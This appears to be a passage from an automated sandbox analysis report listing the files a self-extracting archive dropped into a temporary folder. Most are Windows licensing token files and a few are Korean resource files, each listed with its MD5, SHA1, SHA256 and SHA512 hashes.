| SHA256 | a94c0c8aeef54296a3662a744be2ab6f8c078a216c044aed047ac2555f1f71f5 |
| SHA512 | 819099165a84162bc9f91d5ef9da9c029c0606d4e43e4e29068af021960eb41ff3700358fc29760333c2879cb41a6a95ccb170d6a8638c2449917eca5cba0ca3 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms
| MD5 | 2b07d90c6f9b04ccb82191029609099b |
| SHA1 | 4d676fa6197b7511d60dd03816c5d72589496d4c |
| SHA256 | 032562ca252cef56ce818ca806df8dbd77b7e0896b7536bf387acd5f616034ef |
| SHA512 | ae3330135f03c268fb060c5add9bbb3ec48efd05e5100e0ee9cc3583a2c5d1b69cd9f914a6363d747a68d65952793e1d6420f16e411832b9464371ea660ecb76 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\appid-ppdlic.xrm-ms
| MD5 | 7097f418d4b83570c9b014fb626572a1 |
| SHA1 | 5facafd5ac48ba31ce68c64e9d92d9977b427cf5 |
| SHA256 | 48be90970533b49bb33ac8318ce124268ef92fd8bf828383cc0f359e8cfb5727 |
| SHA512 | 01607ea00b4daf9c2ad38f300a1482b9d509f4fdf8cb7f24b620d3eb2cd09ab8585437eb0d50d18b313e9f6d795ec58859e7568249284744356963644d77db8f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\appid-ppdlic.xrm-ms
| MD5 | 40443e2895c8d0af0802eb9fd8327d2d |
| SHA1 | 6305120b711e98f59bc2576f63aa038cc66278b6 |
| SHA256 | a492f612b7149e2e23ce1ee481c718ee5c11e6add36d5287b47ee8bef07255c3 |
| SHA512 | 0b132b33a54c1ed29946a7c2c5c6b59078358a57cea6d51e65da0f56bbd868a957620f394d16668f5f83c9ba3254c1adfaffdb3f4985af450dc77adf3eb4312f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\ChangeDesktopBackground-ppdlic.xrm-ms
| MD5 | 9639f160448ca086725f2e201eea829f |
| SHA1 | 464bbe14fd544ea209b204681387c6bb1c7b4ba6 |
| SHA256 | a7e98c1f8e956303918bf0dd060d92814f54f5d8750c2a9b4876c26bc584e798 |
| SHA512 | 0d7d43622f7e9b5b0dfd2c1c381040aca503f513886e759bc7a07b4817e2c4b86aca2ab096aae4f8d8fb2c1833013e2ec984db8bc87c384246435bbd1e322b3c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\ChangeDesktopBackground-ppdlic.xrm-ms
| MD5 | 251b382de4f350addebe9202f5ac6624 |
| SHA1 | d3d4c736a2cabb8db0990e7ebaca2c6efef7f060 |
| SHA256 | dae9dcb82a1fc07ad6c9800143654634b6bf1e6240b40aa164d8e95c4a1f6b62 |
| SHA512 | 6fe137e252b0e03fc06b9e93f072c1a4f53196488ea839467cdc87b7cbfe46dd82e15d897bc35c804d6d95c32bfd3fe511b352fc2d93d4af23a33bc5e9a6da46 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\CaptureWizard-ppdlic.xrm-ms
| MD5 | 16c897eb67222266e7fde3e66b9f334d |
| SHA1 | d2e7939f11c5f2cd3c3d4732538b36a4c9afe445 |
| SHA256 | cb2dbd84148e08af51b628031b1a61c1b32350ae606c86d539734b4161f83770 |
| SHA512 | c7c683246afecdf73d1020b46dcbe1841e3ff752d3e8764e75fdf178dd185ca299aa81729a8c48d61803fa93a3d0a80ca72d554166035bb3db6dd9c181cfc81d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Cert2.1\ACRSYSACRPRDCT.XRM-MS
| MD5 | d2a59a8f4c2280d45165363e377ced91 |
| SHA1 | 6cf0a51fc0403d4dc02e3bb4f605d5da69bd94f6 |
| SHA256 | 7a9a5a6dc2f4944b534a3f67dabbf036fd44be79ab34c7e84f0a01bf3b0a779b |
| SHA512 | 71bb0db1ca839b4ef893654927934eecbb6e6001829e1dcf7825fa047b5e28b3dc6daf7247ec7990075f0669174e6087e328e2ab35b2b146ab0f87c458a25cc6 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\ACLUIFileFolderTool-ppdlic.xrm-ms
| MD5 | 0a17d8b4273b9356ca9bbaee26d34d49 |
| SHA1 | a10cd7dee5358c511858c2d1bebcd41f5fd8a75f |
| SHA256 | 62d3ce7520761fc4f637cfced0ed0f8578d32ca0fa7f2dfbd70ef3a03a3d298d |
| SHA512 | ff6066f2ea0af14aee6829568ee32eeb62476cafcd3b2dbca4d2ad907dfd2acb14c00dcb4b12f2c098f60b5a3d4b09aed041d1898ac3e88407e53cd278a354df |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\x64\winsxs\amd64_microsoft-windows-themecpl.resources_31bf3856ad364e35_6.1.7600.16385_ko-kr_bcf4e4c2171d8468\themecpl.dll.mui
| MD5 | c6e7e1674fd77fe944dc40ccf5fb8ab3 |
| SHA1 | 70dfa87edeb19f11a4f8c423a32749c43df580b1 |
| SHA256 | 9bd7b658137b2320eb25af1fdfd3f439fb57a5893f6d8429bd785ee468e66e78 |
| SHA512 | fd2ce2b54e1fa446461eda5f1c4c93e8de0fe2ea0b76d3f29afaf1fa8d01796ac3e865b5ee526d17b31a42bcab67e5a3b7abd2a1edcaba89e05f9d6f282e7d8e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\R\x64\SysWOW64\ko-KR\shell32.dll.mui
| MD5 | 58d29c85bb142be898ae37506bfbd314 |
| SHA1 | 2f1db8f3b29825b8e06a0ac8dd09ffd8b42c16b5 |
| SHA256 | 9f8a10bbe8d42b9ccd94a910cae46f75cd52a9718a339e20d54ca3989c949ff7 |
| SHA512 | cd9e4a4f6e0ced6627c2d43ad7c563eb07ced9b5ec2d12511a7e1e4919ed54b028f439e5e230f060bacb94d0254675ee65fbbf06fe968672c63c16c135cbc782 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\Shortcut\x64\SysWOW64\ko-KR\Display.dll.mui
| MD5 | 7e74f142b1aaca35c3c6cf28b6a40b86 |
| SHA1 | 5fb838b42fd9268f95769a301ea214519f144768 |
| SHA256 | 3bb9a3802f2a5aae367d46d39d478f0cd15fd7b1208acbbb7fca5426fdc6aba8 |
| SHA512 | c5f3b19330d8f61a721fe1f94d39477a3ed45406ce9cef92dd599dd860381081ed211fd37b13457c5a8b4ca6db466f22e91a1e72a67f3444804a076a67084019 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\issuance\client-issuance-ul-oem.xrm-ms
| MD5 | e892e1b25539c170cc01bd74a15ab962 |
| SHA1 | 3e654148ab1c134d9767e91fedb2f5e7e831a98a |
| SHA256 | a155b80e8b6b2b7f835cd558c099efc8317b981fdd72341e5f2437ae57f2d6f5 |
| SHA512 | a26dbe7c512ce265ded7c65c83c29612093cfdb168c7a1792d9bdb4d1e294a73981fd27e8265ea9a63556e1769512d3e4c93c36759678293d9d5755353f8904a |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\DirectExperience-ppdlic.xrm-ms
| MD5 | 45e01af8a6dba520b69b9741eec236e1 |
| SHA1 | dd35aaa8379dde2562ea9c9a4a12edbe59c4fe53 |
| SHA256 | e3704442713955877e6bcd695e4cfd01f71d0d2276faf05c867e724c6ae7a0e0 |
| SHA512 | 2b56fc0eb9fece40fc106fe9e0580f9e483639cb3178c8519fbdeb58cb6f3dca96b31f9ba5a63e0d4e7cae2cc80255739edc5fa9ce7a4da027b1900fbcabb844 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\HomePremium\tokens\issuance\client-issuance-ul.xrm-ms
| MD5 | 12e793fe60505bad1c3df58779d83dab |
| SHA1 | d547957e832444b8f58653afad277601ab8dec4d |
| SHA256 | 73c4c8445a6b4813cea814199f6364ad5a5054797a10fec9c47d77b811fee640 |
| SHA512 | eaf6c27de9f71bcdd8412623e32ee08145932826cd802ba398765f283b38f3181bc6940cebd4343199d754dc4243b608c2bba223c31805341b282b396a972053 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DNS-Client-license-ppdlic.xrm-ms
| MD5 | 7756bb922ada3f52d1f50e8988246cb4 |
| SHA1 | 958a64d5c9fe9416d77293cab4e8b098e9e85b73 |
| SHA256 | c58d4cd6ae42863b111f46869949e0467d53ca0eff04c4a7084d8d4d257f10a5 |
| SHA512 | 9a570e632af55231cbff69fee9dad600ccf406b0263d7945c134b040acd8cd1bc37f630dce80283ad24aacacee1341abbb79c7a1cfe25c45fe89c26dfc5a0a2d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\DNS-Client-license-ppdlic.xrm-ms
| MD5 | e5fc1f60c87f0764296f279426f2de4d |
| SHA1 | 7a7d9b45dab4a2bc57c523e8e13a70eab18a6a55 |
| SHA256 | d155536463afb3f2559fc2cec0a8603ec36461905b3898d2ad66111b84ac3650 |
| SHA512 | 3429c00c3aa340c4eb64264e063b071963495da934ff784388a4a2da3aa222c24083eebfc813bd184ea244870440d99b5643b42657cefa3531803e115db14635 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\explorer-ppdlic.xrm-ms
| MD5 | d653e5080f8f1b158f11a372c4aee9a8 |
| SHA1 | 21d98aa134df90f33d9dccf5c11646dd94461d7c |
| SHA256 | 4d460348ad0f8e43cb32bdf3dfc089233aff2b21e37a91729fbcba0b42b243d2 |
| SHA512 | 03e7256a24852ed5c3576ee33f540b86c2eecc58d9b443f7520a17b5414e0917ba78fab4dec431bb8f5f0f5f74bfca460c17fc54822889ea429da74b77e7e574 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\explorer-ppdlic.xrm-ms
| MD5 | f7dc315ba4e465d20ea75b88d5c3a5f8 |
| SHA1 | a305757ccff94389969611ac01b630874fe249d3 |
| SHA256 | b673596ef7cdb0a59672c956929aaf5f390cdf7f87144d052adaba77d8292086 |
| SHA512 | e399ab67aca421ae84e3106c3421929c7f9a11b6a700993fd89d3b3ac0aa9e24a3418761d29a346710de22a43aed83864ab0a90ceec5a199cddd1928e3648e6b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\explorer-ppdlic.xrm-ms
| MD5 | eeef7b6c4ce548e031d7fca8a06cc697 |
| SHA1 | e98fbd5f5182b398b58a8d89145c9cd61a50921a |
| SHA256 | ecba5cf4114af056c705d284468d5b53369c9ef432fdfb1cd1ade8b16916e7f4 |
| SHA512 | 67d449d394fbf2d31e1222a15a202c1a00ce5b52d5dc294310966b168fbe7170b14bf29add5a3236e06d3ec1a3d14df3bfa37fa41c69458d0a8934dbc8712550 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\DirectExperience-ppdlic.xrm-ms
| MD5 | 1228499706dbd67ef64e2655bcf1280d |
| SHA1 | daabba98af2270775f02de2a76494a6c48ef8754 |
| SHA256 | 83f7ef0bf97331aaccc884266dcdb6be2389fafa16afec0ff22c1cfe2ba52421 |
| SHA512 | 8e1130569e80fe6eccd16b964a4d36224946f23b87f23f2303e9961828b886a0941c9d241acf5e941a22d5727a9f7ca637e843fc0a55d0dc72964e4d1279ffb1 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Enterprise\tokens\issuance\client-issuance-ul-phn.xrm-ms
| MD5 | 332947e258e1114c7f2d852bce62eb80 |
| SHA1 | 75f2371b2c20b5ade740dc1b0d9e9c622135673d |
| SHA256 | 736da0a46142d2a7dd9b2d23442c0eba995e50e8ecef55fdc1ea58443970130d |
| SHA512 | 0c4105e7ef4621929dbfa6191ba1b2019bd827b40bfef5fd3f98b1d773d7483c2348dccae8294ad13a85a844882695b0cb8f0a91c1d0fe75eb8ee94dc3393341 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\feclient-ppdlic.xrm-ms
| MD5 | 68c4a03617e4f26e0c0c9a4b24859e9c |
| SHA1 | 76304e5d962d327e8b1dc169ccee871a325911a2 |
| SHA256 | 36247a9583ef91045c268cc43e6111d901043c977dc0357cbc0c1bce412085c7 |
| SHA512 | 50928957f3a76ec73c596ac7098a0963fcdd383ebc952ac2d0dc3f7cb508f1cf7e376d74532091cadd57a735e6b3744e593ca0f21557a29371ea6bb8a3c1368f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms
| MD5 | 4280e9e5bc22508620a384c43817e75a |
| SHA1 | b894b6ff5cd8eb750de50c66d33c8b02107f80b2 |
| SHA256 | 6204106d9744b056950c05d8eee1367e1aad1ec6a8a5a597b26a29ecd121c6a6 |
| SHA512 | ded077eb0ddeae28cf273d126c87c80295144d175adef0263f4285cde1ef3dd0ac3383b6db7e24320a694bb396b558d1a80ef4be05b2f9ac3905e3c3e93cf50e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Kernel-ppdlic.xrm-ms
| MD5 | 2f271db1298e877eeea0fef3d10142d7 |
| SHA1 | 6961cbc5d6ba29365fea56180beecaab8796a141 |
| SHA256 | cdd917b6a4e89493b26c295a5d538973d526dffe7bfedbf2e22359d24250004b |
| SHA512 | e0f79ac2f07859ca876113e82c15da85737fcb00bf89f5fef658f5e3522ecc22e0c0150f5b5b1589ce9c5883c562637b7968db6925e204dd830db1b16511ea12 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MCLicense-ppdlic.xrm-ms
| MD5 | 7b56436619b89659e398e4a4e1601e29 |
| SHA1 | bb63a8630808e7d8dd31a839be1b02889bfb4e53 |
| SHA256 | d74444b75681c2a6bf3a96a65a2870c86032127dc0c7595e4817cb86387ccc1c |
| SHA512 | de0459fc8aa339420810da590c1b598d9f9607c996fedc1f3daa0d195e2a45954f8132b052cb3893d2fe4288dd231abfbf16027913569c446e910801f236f0f5 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MathRecognizerEventsLicensing-ppdlic.xrm-ms
| MD5 | b8c5ae3dc47030cec78d84098e519227 |
| SHA1 | e19d21e0226cc18575144080359f10f6167c413e |
| SHA256 | 9e4393351a92b6482eab7ddc0f538bbb9ee10b462860dc5b472d6877f83b9351 |
| SHA512 | eaceca2d41681f0ce6b9ce24507c38d0d1ef59c6fed8bb81f2274392114a564148e16e0dd9ff93932fb9c96ba1dd987d034cb03100317eef9268a468af3c1196 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\LSA-License-ppdlic.xrm-ms
| MD5 | 9d7c5200b61f953120941ac7fcd7fcf5 |
| SHA1 | 4049deefd1b74d426007b92142a4d0f0741744b1 |
| SHA256 | 12d9d6d044720d681bb98ff805341c3db1144ea1dae7ca0c3455a898ba415ecb |
| SHA512 | e2e8e79aa9f0e7c2d0f6f7dfa2f6839fd2390b24a3944353c3d693fb4cb20d777df6c6fa63d0177ce3fbd5495085ccbd513ded6ebb8f2e2af0e7d070dc6067ce |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms
| MD5 | b206c05031dda75f4eafdce12553547a |
| SHA1 | 722ac92fc1d39be5afa2e0284ba79305d22090ed |
| SHA256 | 3a5d2084ae0b79d4f362049d5eb163264fc8058acb6ffb561f41a648926ab154 |
| SHA512 | 79d5b6ac6b3036479e268b47a2c7c322d991b596503d45aa16fc2a5289c230968bdabfde6de96a68d987644b09a6a2d7498997d6bcea4c6a1f2134af131cc27e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms
| MD5 | 0f3f2fee079142ccb1b47b9ce7fa8c27 |
| SHA1 | 8d1b2331241bf8f950f3135704f0683726844667 |
| SHA256 | 20935b33839cfecf508eb0750f8f6316ef05691480c97a70749a1259455e036f |
| SHA512 | 06b8bdb75a2310b122d39182fbf958d39387c278f5b5e6fb6fda160a058257908665d03ecdf94399c31f482d086057ce4203b18d3c77912b6f9b1c96d01d6d2d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms
| MD5 | 5528b6d1c60f088625d304690d8296ab |
| SHA1 | e0937bad179bac3e1fff833fefcca453b4d3d0f0 |
| SHA256 | 2f3210da0d80a3e02f17527da31058509c4612c7ffa94c92276bb6175633ea8a |
| SHA512 | 96a5c6521afa4f241be0e88e14a3f5a365293fa45599c1f55b81fddb0e71426bbe0b0026eca196e9c6462c7275dce0a942490c255cee7aa7c32925d3058d9e3d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms
| MD5 | 254d4a7871d284c00755874ccf99303b |
| SHA1 | b7ccebafc995ed9b7ff270ff8ef7c0fd85888770 |
| SHA256 | 959d5c6899d354daccf6ebde5bef5171a6321dd5917ec71a3731c5a59db084ba |
| SHA512 | cd4ed15b4256db8ee913b861fc1f4154bf26afc59a46bb1c2881982642aa5a2fe4362e1ebe61bf6bcb454b67ff375c46650ff9294eaa2c6ccbb44aa9b70635e6 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-Fax-Common-ppdlic.xrm-ms
| MD5 | 5a612699592c4b55612f9a7564d5e8e7 |
| SHA1 | cac3ffac98ac5e78619bbe482fc23749059563a0 |
| SHA256 | 47393fc6dfadd9d018a95c28b437af71cea1a0036408791d59ce527742c9f486 |
| SHA512 | cda713d6376d19b9c50bf617de8a844f4eb0dbb207edfdbf90d29be9cdb6ea9a1b53671b10c3eaa343baf658df298a5bca7165d1ab14ea13091ff2220c363200 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms
| MD5 | 4b0b6942926577bd62e8a23445b245f0 |
| SHA1 | 4b3e78e94d920c4bf8ee4e199651dd40696934e6 |
| SHA256 | 1f51eab331bf1c95284b17f583b730a157517123af4e4ecad700007b05aa615e |
| SHA512 | a51377cc34133469f3f31feb55f4709f6922a5cfa0fb948804ccec7029dfbf1af5d101f6684790ace879be7324670d4f011eaa889162ebddaa5de302b48198da |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms
| MD5 | bb2c62953a247c5925ef46410778617c |
| SHA1 | d2d479710de7deadb72592d0c041d948c1f2b408 |
| SHA256 | 37ee58d8565a38240e783268176746e3d3c1f50e54b0aaf4cb8f9d6aaa40afed |
| SHA512 | 8fbc4eb4bc73e4ec2502c0d2099f66eb5251753342aaf125f0c41febca12db17e1e3edcda7b74ca2c8bd2c62c258602ab9d1c51278535eb344575ba674f8cec0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-DOT11PREF-ppdlic.xrm-ms
| MD5 | a2ebd763803fda481ba8d78904b8e999 |
| SHA1 | d08c0e77af6bed634e3344597472015cef44a137 |
| SHA256 | 26d95c2de97ebfa6b9bd62cc0dc3c7262f19cfa856d94e2d00adedf7c2d44d60 |
| SHA512 | 8659ed9dbc0dc71552470d53c3bcc6487bbfa201c519cfb1f3b796d810496fb15da646ffe824e244c5ab552041513f9cc0b412e3e2989adbfc4ce759d84d5956 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms
| MD5 | ad026fb805517c0cf9edda42f6ea4c7d |
| SHA1 | 4e788be07124ded88bdc05f5e31b14dea4d47e06 |
| SHA256 | f5bfa1cfe94b0470fc8a3ba18019d90f4225c9cbda196c10940e346d7aeb8240 |
| SHA512 | 8fdec5a61c696db9726f42c3a35a2038131cec5f14bea3cd0c935e9096f2fc55903417aa8753961d838713b7d3ce51ab856974a170228c84ce6b7317a6ac4424 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms
| MD5 | 8ecc877351ceef3516e51ef7e3b10b8f |
| SHA1 | a81637e8ad25797a59fb6ef9bb66751ecca6845b |
| SHA256 | c7db0b64ad1d626514f13d56c2096258314ab861a806925a63854ca4d73d7f98 |
| SHA512 | dabdbb3a45f967b51efa531951f23657c126328a9f11b7918aefebe08dbb42cd571d28d457ebbffcd4a1e4f648c7c3ab747e70f3c05b26acc22cfa0c520c5841 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms
| MD5 | 004edc151be054f27529bac1e91075f8 |
| SHA1 | b79428ab8a224619f8d8dbae49268ac9406ac6f5 |
| SHA256 | c6de9449971090c3afa9a1de1e3e112a5e1b9227f7301b032ceaf9eb1b1e4458 |
| SHA512 | 8add1453dd69b7a978743e4a2669e5cde159debf307a610ddade599f5d304ea3b5918d0dcc4f2cdfeec2b9dd6ad7fbdd391b1161361dd8fd2969f980b8778c1f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-DesktopWindowManager-Core-ppdlic.xrm-ms
| MD5 | 7ac4a762939afa908557abe7ea3feb4c |
| SHA1 | cec7f1d321f96760861d76b7d81d56a6ae1e3d49 |
| SHA256 | c8b53762be3ff5983cbf4b2e1e11b98b9e769f5e1619a0903bae007bab1059fe |
| SHA512 | 44fb529102519d4a2fa892228cb63f2f26dfc40a765273e8807d4878571af19b0fd6a9e4de6ae32f11e1a3727053d845b8e20ce01f4a401e096580644c51e80c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Microsoft-Windows-InternetConnectionSharingConfig-ppdlic.xrm-ms
| MD5 | 496c412bf6aa299d21e9a86898ca8569 |
| SHA1 | a38443d079cd05e93233750490383fe0df40dbd1 |
| SHA256 | cf5db87c483b03dcb1161673e60512873dd0c3c398641617f1d257b82a576c0a |
| SHA512 | 42e6e0e8720bf968834d142237c33c56a2bdab15ee4bb7014c42477adba82fed972e563a48af1e216431046fd9d30f88dd66bdb085131f6f02d956519f5d113b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-Core-ppdlic.xrm-ms
| MD5 | db42bd1f9f070d51f164ebfd4f3b6b73 |
| SHA1 | 9be4afb376746da087e0213b3a61b9ab5839d3db |
| SHA256 | ff66ec48527685ce2db54495908800ec0bb31c6d215b83e03728f3eae2abdadd |
| SHA512 | 7e84c91aef83b60bf8b168d2a5a8d6076a7a8c63c8427b5bd013c37f6a246b19572a3d87b850a15eff2735eaebf5352c6d67afe2e09a236d2887d53a3f81c8f7 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms
| MD5 | 7102b57189ffc359989cd5c5dd848c0d |
| SHA1 | 4a10f1df5284b1d949ddf5a0f9788b76b6cc8f58 |
| SHA256 | 4b6eb0b0faa90780658301f26a4b4fcc2ad95ff56dc264c13402c430ae13f48f |
| SHA512 | f745461d584535c40442b2ffa31464efcced05b775f2fc91daa03d1a1747f69570dc107746393067a6e362e7d4ac4f1c201d4cb0c6e54cbefe059f5489a69ccd |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms
| MD5 | cfc8a17c78a832b037ef88df42e74129 |
| SHA1 | 74b5d2857222e83dd8f2e55068388d3553cbc0f4 |
| SHA256 | 3f52bec95945c4e015520df3f7d26d67067ac7ef207038d67d4486d2ebb676c5 |
| SHA512 | 34ac48bc3a34841a2054f55b226061846797f9a93ad878f7db24ba4b9f074e17fdedac4365fcee5bcc0d10d23eccac14f1c263c6778ee68e0e8664e1e8420b2e |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms
| MD5 | 89707824f9eb5d4c6bff43c24b8b67d4 |
| SHA1 | 265ac3821adb755387235457b4edf6c18167d575 |
| SHA256 | 58bc96e14a3c9aa192853ab26e3e9343b3660d82be997ae557c4b1f37b8b0832 |
| SHA512 | 6116a25a605fd30c3a59576f4ecee2f5bb953d445a76ae80245154ced656b3d90818086c0499aa4e23caf2bdb8865d1ebaf60afe0a745a4962068731988421cd |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MediaCenter-ppdlic.xrm-ms
| MD5 | d356fcea82a3b7a937e4375619683434 |
| SHA1 | f4ae7b38eaf1ad2b78c5f48695ce6c95f88ceca0 |
| SHA256 | 14d49431e6c7381f2f3c39c14f6fff88a1f7039113907ceea0fc283d326b3850 |
| SHA512 | 5cb66b5b1b6b004bd676caa2fd740d671a64325c71dd755f1d444508892782a4f14944aff7afc9068396c37a091ed6877bb472a58f1687bb4ec772c467ef0617 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\LSA-License-ppdlic.xrm-ms
| MD5 | 2ce388c6499b1735aac867d6b040c630 |
| SHA1 | 7dd1a01e7be48f5c7de5ca8a9e59a77a6d926b53 |
| SHA256 | 75db0a68a92f262316a7d1e8614a4ebed178ec8135ead5086b73f02a197b2a3a |
| SHA512 | 36cd480abf828cbb832d18621dcee7adebc714f256a0d35baf4953fb542ebf170eacc7568fdf548380eeec7867972c4c1ef469c22289934d11b411c78ab0d0b9 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\LSA-License-ppdlic.xrm-ms
| MD5 | 693ce90f47a550bad0ef38fa5597ba97 |
| SHA1 | 496d58bb638d8d13174415841cb9138492bed0f3 |
| SHA256 | f3f1bdf5524cacb5f5b62f7d4e484757ea485b2a8463d1d39fe19fb7492aa7f6 |
| SHA512 | bc7befc8c60100a4d1658f238a7486979f5a4df86e22fe9471f803414fd763cdd95f7cc57c442a1d78d6bba26842688b9c7469ad951cdda34970a212d6aeb491 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Microsoft-Windows-NetworkBridge-ppdlic.xrm-ms
| MD5 | fd33b8b79bcf5ced20915a0dcfbc9002 |
| SHA1 | 093f08777c07698a32cea894481525caae82be55 |
| SHA256 | 36213635fc3db3d1a357a614d89f355df0f04668c49257b888c6052a93de7d06 |
| SHA512 | ac2f07adf90f2dc2e6e2f48c9ca4f94fbc3e6dc3ab596e65181609e97fcc776f0f9296e1c147cbb17ebd6724105a3fc74dde040f8115b2304955bf6b1e58e2ec |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Kernel-ppdlic.xrm-ms
| MD5 | 09979da0bfed5e0e1811886fbc9d9b67 |
| SHA1 | 06f9d2da5fe50162af4cf098b275c22f91fee0a2 |
| SHA256 | f2de33d71fe50b113f6b84922fa6cc4358387c3005772b948e2d388d309608f8 |
| SHA512 | 98f699131f34b50955b302e9c66d918e3870ca2a6306921313c4bda947d3be24681effc659a371007f1f350369ffb96ceb3a94b601a5fe7091c6ed99a69e88bd |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Kernel-ppdlic.xrm-ms
| MD5 | 010255f2a744182d2e7de3cf62a04386 |
| SHA1 | 3d62aa84dbb22854c16032e775d564f76ebe18be |
| SHA256 | ef23ea9ffad3404a4ca42561cb400ee9a6e59fe8fa076d0af87e93c50371a0c9 |
| SHA512 | 4cd2a03581d94a875dfc8f4fd9248aba76f9dbdeaf8a528d9ea589862cb2305eddeb85cbaa5eeabf13366e07722018cae322975fd46a03cfd46928588a1a9326 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\IASLicensing-ppdlic.xrm-ms
| MD5 | 0821fc1abadb7004e66049a21c7b305c |
| SHA1 | 53e459663c2f8f13bbad30896fd34298c2df7742 |
